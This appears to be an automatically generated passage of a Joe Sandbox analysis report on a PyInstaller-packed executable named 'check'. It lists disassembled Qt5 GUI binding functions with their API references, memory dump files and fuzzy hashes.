                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?sibling@Index@@ItemModelModel@@StandardV2@@
                                                                                                                                                                                                                                          • String ID: BiiJ9$QStandardItemModel$sibling$sibling(self, row: int, column: int, idx: QModelIndex) -> QModelIndex
                                                                                                                                                                                                                                          • API String ID: 4033914243-2828631231
                                                                                                                                                                                                                                          • Opcode ID: 135fce5793d2982851daaad1c806d99333b58bbf3db7662b1d916b3dbd8bb9ea
                                                                                                                                                                                                                                          • Instruction ID: 04a04c9238ebb5e0d761613ad2c313e6800216ba208cd3757e13e578f25ad626
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 135fce5793d2982851daaad1c806d99333b58bbf3db7662b1d916b3dbd8bb9ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96411D37609B8686DB608B15F4447AAB3A4FB85BD4F444132DACE47B68EF3CE158CB04
                                                                                                                                                                                                                                          Function 00007FF89D9B1DB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??_5ClearDeallocErr_PainterPath@@SubtypeType_V0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 3782086040-2407233842
                                                                                                                                                                                                                                          • Opcode ID: a4a34e5d2ba8fedf45471c823aca0f4390a1b510b39d012cddb1247cb02abc06
                                                                                                                                                                                                                                          • Instruction ID: 5bee5dd4ef8bf68cb77d885964666bf7ecf34028ff4ce995ebee515c106736ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4a34e5d2ba8fedf45471c823aca0f4390a1b510b39d012cddb1247cb02abc06
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F31DD27A08B45D1EA609B16F845169A3B0FB89FD8F494432EE8E13B64EF7CE495C704
                                                                                                                                                                                                                                          Function 00007FF89D93DDF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?drawTiledPixmap@QPaintEngine@@UEAAXAEBVQRectF@@AEBVQPixmap@@AEBVQPointF@@@Z.QT5GUI ref: 00007FF89D93DEF1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?drawEngine@@F@@@PaintPixmap@Pixmap@@PointRectTiled
                                                                                                                                                                                                                                          • String ID: BJ9J9J1$QPaintEngine$drawTiledPixmap$drawTiledPixmap(self, r: QRectF, pixmap: QPixmap, s: Union[QPointF, QPoint])
                                                                                                                                                                                                                                          • API String ID: 4155984045-2242633221
                                                                                                                                                                                                                                          • Opcode ID: ae30e2d43485c4eb3d04c5792709820ee6713515d118215b7e44870b64c22745
                                                                                                                                                                                                                                          • Instruction ID: f407e271178865c3bb53d4c4003ace3d8e2f2887f83de686553f6156f8b203d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae30e2d43485c4eb3d04c5792709820ee6713515d118215b7e44870b64c22745
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D341C937609B8585EA709B15E4843AAB7A4FB94FD4F444136DACE43B68EF3CE158C704
                                                                                                                                                                                                                                          Function 00007FF89D9BFAD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?sizePixels@QPageSize@@QEBA?AVQSize@@H@Z.QT5GUI ref: 00007FF89D9BFB39
                                                                                                                                                                                                                                          • ?sizePixels@QPageSize@@SA?AVQSize@@W4PageSizeId@1@H@Z.QT5GUI ref: 00007FF89D9BFBB0
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Size@@$Page$?sizePixels@$Id@1@Sizemalloc
                                                                                                                                                                                                                                          • String ID: QPageSize$sizePixels$sizePixels(self, resolution: int) -> QSizesizePixels(pageSizeId: QPageSize.PageSizeId, resolution: int) -> QSize
                                                                                                                                                                                                                                          • API String ID: 2324535246-1560509091
                                                                                                                                                                                                                                          • Opcode ID: 66e414b494ddf837f25a746e84172902b47f45ba007d1862b03aa6034a574a9e
                                                                                                                                                                                                                                          • Instruction ID: a36226ba378e5a31fa3c060f5c0b1221f5887952dcc79abb0686b7135d56f738
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66e414b494ddf837f25a746e84172902b47f45ba007d1862b03aa6034a574a9e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C315E73A09A06C6EB108F15E8556A933E5FB84FD0F914132DA8E07720EF3DE555CB44
                                                                                                                                                                                                                                          Function 00007FF89D957E20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setMarkdown@QTextDocument@@QEAAXAEBVQString@@V?$QFlags@W4MarkdownFeature@QTextDocument@@@@@Z.QT5GUI ref: 00007FF89D957EEA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setDocument@@Document@@@@@Feature@Flags@MarkdownMarkdown@String@@
                                                                                                                                                                                                                                          • String ID: BJ1|J1$QTextDocument$setMarkdown$setMarkdown(self, markdown: Optional[str], features: Union[QTextDocument.MarkdownFeatures, QTextDocument.MarkdownFeature] = QTextDocument.MarkdownDialectGitHub)
                                                                                                                                                                                                                                          • API String ID: 4162315510-1142115851
                                                                                                                                                                                                                                          • Opcode ID: d580350cc8bd0c0dc915bba725e2cf6bc699f5d1c6cd3be88189093a3fb6e6bd
                                                                                                                                                                                                                                          • Instruction ID: de85f13daa191d733e7f939cfce87b4d1bf231080c06e878260c8788228460b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d580350cc8bd0c0dc915bba725e2cf6bc699f5d1c6cd3be88189093a3fb6e6bd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4641B13B619B4585DB60CB15E8883AD73A9FB48BD0F814136DA9E43724EF39E958C704
                                                                                                                                                                                                                                          Function 00007FF7124F2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7124F918F,?,00007FF7124F3C55), ref: 00007FF7124F2BA0
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF7124F2C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                          • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                          • Instruction ID: cba7b91b10c78df430e1eacb77bafa8c185751a48a2d9d25eeb7d5bc6aee0c6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D21A162708F4182E710EF18F8857AAB3A4FB88794F804136EE8D57655EE7CD619C750
                                                                                                                                                                                                                                          Function 00007FF89D9A1AA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?position@Block@@Text$Bool_FromLong
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 3416477650-2407233842
                                                                                                                                                                                                                                          • Opcode ID: 8774caffab72a64adcc6f75695b45b357ca1073eb9c73a8f65749ad8fdc56cea
                                                                                                                                                                                                                                          • Instruction ID: 5d4805e25314496ea77f89201c429bc206c5bf2804cc6c8db5e5b197a3d83c3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8774caffab72a64adcc6f75695b45b357ca1073eb9c73a8f65749ad8fdc56cea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC21D86BA09B4686EA219B55E4481A9A3A4EF84FE5F444031DE8E03764EF3CF495D708
                                                                                                                                                                                                                                          Function 00007FF89D9BE040 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?name@QPageSize@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D9BE09C
                                                                                                                                                                                                                                          • ?name@QPageSize@@SA?AVQString@@W4PageSizeId@1@@Z.QT5GUI ref: 00007FF89D9BE104
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Page$?name@Size@@String@@$Id@1@@Sizemalloc
                                                                                                                                                                                                                                          • String ID: QPageSize$name$name(self) -> strname(pageSizeId: QPageSize.PageSizeId) -> str
                                                                                                                                                                                                                                          • API String ID: 1812466921-2355090504
